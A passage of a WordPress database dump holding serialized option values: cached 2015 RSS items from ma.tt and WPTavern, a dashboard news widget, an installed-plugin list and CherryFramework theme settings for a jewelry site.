\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Matt: SPIEGEL Interviews Dean Baquet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44634\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"http://ma.tt/2015/01/spiegel-interviews-dean-baquet/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:835:\"<blockquote><p>SPIEGEL: One of the reasons Snowden didn’t approach the New York Times was that the paper had refused to publish the initial research about the NSA’s bulk collection in 2004. The story was only published almost a year later. Was it a mistake to have held back on that reporting?</p></blockquote>\n<p> <a href=\"http://www.spiegel.de/international/business/spiegel-interview-with-chief-new-york-times-editor-dean-baquet-a-1014704.html\">This interview with Chief New York Times Editor Dean Baquet is remarkable</a> both for its frank, direct questions and its frank, direct answers. I got to meet with Dean <a href=\"https://matt.wordpress.com/2014/11/19/new-york-times-board-room/\">a few months ago</a> and it really struck me how excellent he and the other editorial and product folks inside of the NYT are.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 23:33:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"WPTavern: Deflame Web App Aims to Improve Discussion on WordPress Blogs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37875\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/deflame-web-app-aims-to-improve-discussion-on-wordpress-blogs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4788:\"<p><span class=\"embed-youtube\"></span></p>\n<p>Life on the internet is full of controversial debates, people with strong opinions, and trolls, occasionally mixed in with intelligent, engaging conversation. You never know what you will encounter when you venture into the comments section on <a href=\"http://wptavern.com/why-comments-still-matter\" target=\"_blank\">blogs with open discussion enabled</a>, but that’s the beauty of free expression.</p>\n<p>The Tavern has always been a place where anyone is welcome to offer opinions in the comments, even if they’re not fully polished. Oftentimes this results in some quality interaction from community leaders. We use Jetpack comments, but the module is lacking in features that add a more interactive discussion experience between commenters.</p>\n<p><a href=\"http://defla.me/\" target=\"_blank\">Deflame</a> is a new web app, created by <a href=\"https://github.com/alexbecker\" target=\"_blank\">Alex Becker</a>, that aims to improve the quality of discourse on the internet. Both the standalone app and the Chrome extension were built to work with WordPress sites, since the platform currently dominates the web. Deflame offers three features that allow users to “ignore asshats,” delineate a side in debate, and share their perceptions of an argument with others via a unique URL.</p>\n<p>I tested the standalone version and the Chrome extension, using a recent WP Tavern <a href=\"http://wptavern.com/heropress-launches-kickstarter-campaign-to-highlight-wordpress-developers\" target=\"_blank\">post regarding HeroPress</a>, which sparked some heated debate. The app adds radio buttons to identify comment authors with whom you agree or disagree. You also have the option to ignore comments.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/deflama-example.png\" rel=\"prettyphoto[37875]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/deflama-example.png?resize=1025%2C1017\" alt=\"deflama-example\" class=\"aligncenter size-full wp-image-37889\" /></a></p>\n<p>It’s unclear why sometimes the comments receive two radio buttons, but it’s likely that the app cannot accurately anticipate the correct placement of the buttons due to differences in comment templates. Once you mark your opinions in the comments, clicking the Chrome extension button will present a summarized table at the top of the page. It includes a unique URL that allows you to share your view of the debate with the flames dampened.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/deflame-summary.jpg\" rel=\"prettyphoto[37875]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/deflame-summary.jpg?resize=755%2C235\" alt=\"deflame-summary\" class=\"aligncenter size-full wp-image-37910\" /></a></p>\n<p>Becker hopes that the app will give users a way to frame their positions and perceptions on debates that happen in the comments. “Too often, debates over important issues devolve into reasonable people on both sides attacking the trolls or madmen they perceive as representing the opposition,” he said. “Deflame aims to give commenters on WordPress-powered blogs the ability to rise above this.”</p>\n<p>Since the app doesn’t actually affect the website on which it’s being used, it offers an independent way of presenting a user-moderated discussion. Users can show an overview of their opinions, even when a site doesn’t offer interactive voting features for comments.</p>\n<p>However, some may not be comfortable with the fact that the app’s share link hides comments that have been ignored. The ability to view all comments is the only way to get the proper context for other comments posted in a debate. If visitors arrive to a site by clicking on a Deflame-generated link, they may not understand that they are only viewing a select group of comments. For this reason, I think an additional button to “show hidden comments” would be useful.</p>\n<p>Overall, <a href=\"http://defla.me/\" target=\"_blank\">Deflame</a> is an interesting idea that might make a useful WordPress plugin, if its code licensing permits. The project is available on <a href=\"https://github.com/alexbecker/deflame\" target=\"_blank\">GitHub</a>. It includes a small <a href=\"https://github.com/alexbecker/deflame/blob/master/supported.md\" target=\"_blank\">list of supported sites</a>, though the extension works reliably on many more that are not included in the list. If you want to test it, check out the <a href=\"http://defla.me/webapp.html\" target=\"_blank\">standalone Deflame app</a> or install the <a href=\"https://chrome.google.com/webstore/detail/deflame/bfaljebllekeebnpajhkoambfhflhjfk\" target=\"_blank\">Chrome extension</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 20:41:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WPTavern: WP Chat Hosts AMA with Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37863\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://wptavern.com/wp-chat-hosts-ama-with-justin-tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3905:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2013/11/jt.jpeg\" rel=\"prettyphoto[37863]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2013/11/jt.jpeg?resize=150%2C150\" alt=\"jt\" class=\"alignright size-full wp-image-12052\" /></a></p>\n<p>WP Chat is currently hosting an AMA (“Ask Me Anything”) session with Justin Tadlock, founder of <a href=\"http://themehybrid.com/\" target=\"_blank\">Theme Hybrid</a> and co-author of <a href=\"http://www.amazon.com/Professional-WordPress-Plugin-Development-Williams/dp/0470916222/\" target=\"_blank\">Professional WordPress Plugin Development</a>. Tadlock recently <a href=\"http://wptavern.com/justin-tadlock-joins-forces-with-emil-uzelac-to-provide-wordpress-theme-review-as-a-service\" target=\"_blank\">joined forces with fellow WordPress.org Theme Review team member Emil Uzelac</a> to provide theme review as a service.</p>\n<p><a href=\"https://twitter.com/lelandf\" target=\"_blank\">Leland Fiegel</a>, founder of WP Chat, invited Tadlock as the first guest in <a href=\"https://wpchat.com/t/announcing-wpchat-amas-and-our-first-guest/571\" target=\"_blank\">a series of AMAs</a> with WordPress community members. If you’re new to the format, Fiegel recommends that you check out<a href=\"http://www.reddit.com/r/IAmA/comments/1jg781/i_am_matt_mullenweg_cofounder_of_wordpress_18_of/\" target=\"_blank\"> Matt Mullenweg’s AMA</a>, which was hosted on Reddit a year ago. Fiegel has a similar question-and-answer setup running Discourse, which is less ideal to navigate but gets the job done.</p>\n<p>Theme Hybrid is one of the oldest WordPress theme shops in business. As a long-time theme and plugin developer, Tadlock has witnessed WordPress trends over the years and has helped to shape theme development best practices. So far, a couple of the highlights from the AMA include:</p>\n<p><strong>Q: Advice for someone working full-time in an unrelated field trying to break into the WP business? I’ve been waking up at 5am for years to learn and practice WP dev but it sure seems slow going with the full-time job necessary to feed my family.</strong></p>\n<blockquote><p>Start a WordPress-related blog. Write tutorials. Share things that you learn. Learn things by writing about them. That’s how I got to know people in the community. It’s also how I was able to successfully launch Theme Hybrid.</p>\n<p>And, always reply to comments on your blog. You’ve got to interact with your readers. At a certain point, that gets tough, but keep the conversation going.</p></blockquote>\n<p><strong>Q: What is the worst thing about WordPress (the software) in your opinion? How can it be made better?</strong></p>\n<blockquote><p>From a pure user perspective, I’d like to see the admin simplified even more. Get rid of anything that’s not necessary. I’d drop the theme/plugin editors and tools screen for starters. Then, I’d work on figuring out how to simplify the post screen as much as possible.</p></blockquote>\n<p>Ever curious about the future of post formats, I asked Tadlock if he likes them and if he believes they have a future. He replied:</p>\n<blockquote><p>I love post formats. They’ve really been around for as long as I’ve been using WP (anyone remember <a href=\"http://ma.tt/2004/05/asides/\" target=\"_blank\">Matt’s asides</a>?). I think the initial build was put in too soon, so it’s created some problems for theme authors. I feel like I’ve overcome most of those issues with the post formats-related code in Hybrid Core.</p></blockquote>\n<p>If you’re a new or experienced theme developer, this is your chance to <a href=\"https://wpchat.com/t/i-am-justin-tadlock-ask-me-anything/600\" target=\"_blank\">ask Tadlock anything</a>. The WP Chat thread will be open for approximately 24-36 hours, if you have a question for Tadlock and want to join in.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 17:55:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Matt: Build a CMS?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44627\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://ma.tt/2015/01/build-a-cms/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:224:\"<p>Austin Smith at Mediashift talks about <a href=\"http://www.pbs.org/mediashift/2015/01/why-its-risky-business-for-publishers-to-build-their-own-cms/\">Why It’s Risky Business for Publishers to Build Their Own CMS</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Jan 2015 05:00:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: If Apple Made Milk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44625\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://ma.tt/2015/01/if-apple-made-milk/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:297:\"<p><a href=\"http://www.adweek.com/adfreak/if-apple-made-milk-and-other-super-cool-imaginary-product-packaging-162398\">If Apple Made Milk, and Other Super-Cool Imaginary Product Packaging</a>, cool work by the artist <a href=\"http://www.peddymergui.com/\">Peddy Mergui</a>. (Who uses WordPress.)</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 24 Jan 2015 19:45:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sat, 07 Feb 2015 18:31:58 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:14:\"content-length\";s:6:\"225225\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Sat, 07 Feb 2015 18:15:17 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";s:13:\"accept-ranges\";s:5:\"bytes\";}s:5:\"build\";s:14:\"20130911090210\";}','no'),(129,'_transient_timeout_feed_mod_867bd5c64f85878d03a060509cd2f92c','1423377119','no'),(130,'_transient_feed_mod_867bd5c64f85878d03a060509cd2f92c','1423333919','no'),(1048,'_transient_timeout_feed_mod_b9388c83948825c1edaef0d856b7b109','1427106779','no'),(1049,'_transient_feed_mod_b9388c83948825c1edaef0d856b7b109','1427063579','no'),(1052,'_transient_timeout_dash_4077549d03da2e451c8b5f002294ff51','1427106779','no'),(1053,'_transient_dash_4077549d03da2e451c8b5f002294ff51','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2015/03/wordpress-4-2-beta-2/\'>WordPress 4.2 Beta 2</a> <span class=\"rss-date\">March 19, 2015</span><div class=\"rssSummary\">WordPress 4.2 Beta 2 is now available! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.2, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can […]</div></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'http://wptavern.com/pakistan-is-blocking-sites-hosted-on-wordpress-com\'>WPTavern: Pakistan is Blocking Sites Hosted on WordPress.com</a></li><li><a class=\'rsswidget\' href=\'http://ma.tt/2015/03/meyer-sound-constellation/\'>Matt: Meyer Sound Constellation</a></li><li><a class=\'rsswidget\' href=\'http://wptavern.com/wordcamp-london-2015-contributor-day-in-photos\'>WPTavern: WordCamp London 2015 Contributor Day in Photos</a></li></ul></div><div class=\"rss-widget\"><ul><li class=\'dashboard-news-plugin\'><span>Popular Plugin:</span> <a href=\'https://wordpress.org/plugins/wp-google-maps/\' class=\'dashboard-news-plugin-link\'>WP Google Maps</a> <span>(<a href=\'plugin-install.php?tab=plugin-information&plugin=wp-google-maps&_wpnonce=7f9e1918f3&TB_iframe=true&width=600&height=800\' class=\'thickbox\' title=\'WP Google Maps\'>Install</a>)</span></li></ul></div>','no'),(877,'_transient_timeout_wc_upgrade_notice_2.3.5','1426538574','no'),(878,'_transient_wc_upgrade_notice_2.3.5','','no'),(1050,'_transient_timeout_plugin_slugs','1427149979','no'),(1051,'_transient_plugin_slugs','a:7:{i:0;s:19:\"akismet/akismet.php\";i:1;s:31:\"cherry-plugin/cherry-plugin.php\";i:2;s:36:\"contact-form-7/wp-contact-form-7.php\";i:3;s:55:\"motopress-cherryframework/motopress-cherryframework.php\";i:4;s:47:\"really-simple-captcha/really-simple-captcha.php\";i:5;s:27:\"woocommerce/woocommerce.php\";i:6;s:31:\"wp-lightbox-2/wp-lightbox-2.php\";}','no'),(150,'theme_mods_twentyfourteen','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1423334600;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(151,'current_theme','theme49507','yes'),(152,'theme_mods_CherryFramework','a:2:{i:0;b:0;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1423334624;s:4:\"data\";a:6:{s:19:\"wp_inactive_widgets\";a:0:{}s:12:\"main-sidebar\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:16:\"footer-sidebar-1\";a:0:{}s:16:\"footer-sidebar-2\";a:0:{}s:16:\"footer-sidebar-3\";N;s:16:\"footer-sidebar-4\";N;}}}','yes'),(153,'theme_switched','','yes'),(154,'suppress_filters','1','yes'),(155,'cherry_version','3.1.4','yes'),(156,'cherry_force_update','0','yes'),(157,'optionsframework','a:2:{s:2:\"id\";s:10:\"theme49507\";s:12:\"knownoptions\";a:2:{i:0;s:6:\"cherry\";i:1;s:10:\"theme49507\";}}','yes'),(158,'cherry_widget_rules_type','a:3:{s:6:\"text-2\";s:3:\"all\";s:10:\"nav_menu-2\";s:3:\"all\";s:20:\"my_facebook_widget-5\";s:3:\"all\";}','yes'),(159,'cherry_widget_rules','a:3:{s:6:\"text-2\";s:0:\"\";s:10:\"nav_menu-2\";s:0:\"\";s:20:\"my_facebook_widget-5\";s:0:\"\";}','yes'),(160,'cherry_widget_custom_class','a:3:{s:6:\"text-2\";s:0:\"\";s:10:\"nav_menu-2\";s:0:\"\";s:20:\"my_facebook_widget-5\";s:0:\"\";}','yes'),(161,'cherry_widget_responsive','a:3:{s:6:\"text-2\";s:19:\"visible-all-devices\";s:10:\"nav_menu-2\";s:19:\"visible-all-devices\";s:20:\"my_facebook_widget-5\";s:19:\"visible-all-devices\";}','yes'),(162,'cherry_widget_users','a:3:{s:6:\"text-2\";s:3:\"all\";s:10:\"nav_menu-2\";s:3:\"all\";s:20:\"my_facebook_widget-5\";s:3:\"all\";}','yes'),(163,'cherry_plugin','a:1:{s:7:\"version\";s:5:\"1.2.6\";}','yes'),(164,'cherry','a:98:{s:15:\"body_background\";a:5:{s:5:\"color\";s:0:\"\";s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:8:\"position\";s:10:\"top center\";s:10:\"attachment\";s:6:\"scroll\";}s:11:\"main_layout\";s:9:\"fullwidth\";s:15:\"main_background\";s:7:\"#fafafa\";s:17:\"header_background\";a:5:{s:5:\"color\";s:0:\"\";s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:8:\"position\";s:10:\"top center\";s:10:\"attachment\";s:6:\"scroll\";}s:11:\"links_color\";s:7:\"#0088cc\";s:17:\"links_color_hover\";s:0:\"\";s:14:\"google_mixed_3\";a:6:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:28:\"Arial, Helvetica, sans-serif\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h1_heading\";a:6:{s:4:\"size\";s:4:\"30px\";s:4:\"face\";s:28:\"Arial, Helvetica, sans-serif\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"35px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h2_heading\";a:6:{s:4:\"size\";s:4:\"22px\";s:4:\"face\";s:28:\"Arial, Helvetica, sans-serif\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"26px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h3_heading\";a:6:{s:4:\"size\";s:4:\"18px\";s:4:\"face\";s:28:\"Arial, Helvetica, sans-serif\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"22px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h4_heading\";a:6:{s:4:\"size\";s:4:\"14px\";s:4:\"face\";s:28:\"Arial, Helvetica, sans-serif\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"20px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h5_heading\";a:6:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:28:\"Arial, Helvetica, sans-serif\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h6_heading\";a:6:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:28:\"Arial, Helvetica, sans-serif\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#333333\";}s:15:\"g_search_box_id\";s:3:\"yes\";s:16:\"g_breadcrumbs_id\";s:3:\"yes\";s:10:\"custom_css\";s:0:\"\";s:9:\"logo_type\";s:10:\"image_logo\";s:15:\"logo_typography\";a:6:{s:4:\"size\";s:4:\"40px\";s:4:\"face\";s:28:\"Arial, Helvetica, sans-serif\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"48px\";s:5:\"color\";s:7:\"#049CDB\";}s:8:\"logo_url\";s:77:\"http://atgjewelry.com/fuze7/wp-content/themes/CherryFramework/images/logo.png\";s:7:\"favicon\";s:73:\"http://atgjewelry.com/fuze7/wp-content/themes/CherryFramework/favicon.ico\";s:15:\"menu_typography\";a:6:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:28:\"Arial, Helvetica, sans-serif\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#1133AA\";}s:8:\"sf_delay\";s:4:\"1000\";s:14:\"sf_f_animation\";s:4:\"show\";s:15:\"sf_sl_animation\";s:4:\"show\";s:8:\"sf_speed\";s:6:\"normal\";s:9:\"sf_arrows\";s:5:\"false\";s:17:\"mobile_menu_label\";s:14:\"Navigate to...\";s:12:\"stickup_menu\";s:5:\"false\";s:11:\"slider_type\";s:13:\"camera_slider\";s:20:\"slider_posts_orderby\";s:4:\"date\";s:18:\"slider_posts_order\";s:3:\"ASC\";s:9:\"sl_effect\";s:10:\"simpleFade\";s:10:\"sl_columns\";s:1:\"6\";s:7:\"sl_rows\";s:1:\"6\";s:9:\"sl_banner\";s:14:\"fadeFromBottom\";s:12:\"sl_pausetime\";s:4:\"7000\";s:18:\"sl_animation_speed\";s:4:\"1500\";s:12:\"sl_slideshow\";s:4:\"true\";s:13:\"sl_thumbnails\";s:4:\"true\";s:14:\"sl_control_nav\";s:4:\"true\";s:10:\"sl_dir_nav\";s:4:\"true\";s:15:\"sl_dir_nav_hide\";s:5:\"false\";s:20:\"sl_play_pause_button\";s:4:\"true\";s:17:\"sl_pause_on_hover\";s:4:\"true\";s:9:\"sl_loader\";s:2:\"no\";s:13:\"acc_show_post\";s:0:\"\";s:13:\"acc_slideshow\";s:5:\"false\";s:15:\"acc_hover_pause\";s:4:\"true\";s:13:\"acc_pausetime\";s:4:\"6000\";s:19:\"acc_animation_speed\";s:3:\"600\";s:10:\"acc_easing\";s:12:\"easeOutCubic\";s:11:\"acc_trigger\";s:9:\"mouseover\";s:18:\"acc_starting_slide\";s:1:\"0\";s:9:\"blog_text\";s:4:\"Blog\";s:12:\"blog_related\";s:13:\"Related Posts\";s:16:\"blog_sidebar_pos\";s:5:\"right\";s:15:\"post_image_size\";s:5:\"large\";s:17:\"single_image_size\";s:5:\"large\";s:19:\"single_share_button\";s:4:\"true\";s:10:\"load_image\";s:4:\"true\";s:12:\"post_excerpt\";s:4:\"true\";s:16:\"blog_button_text\";s:9:\"Read 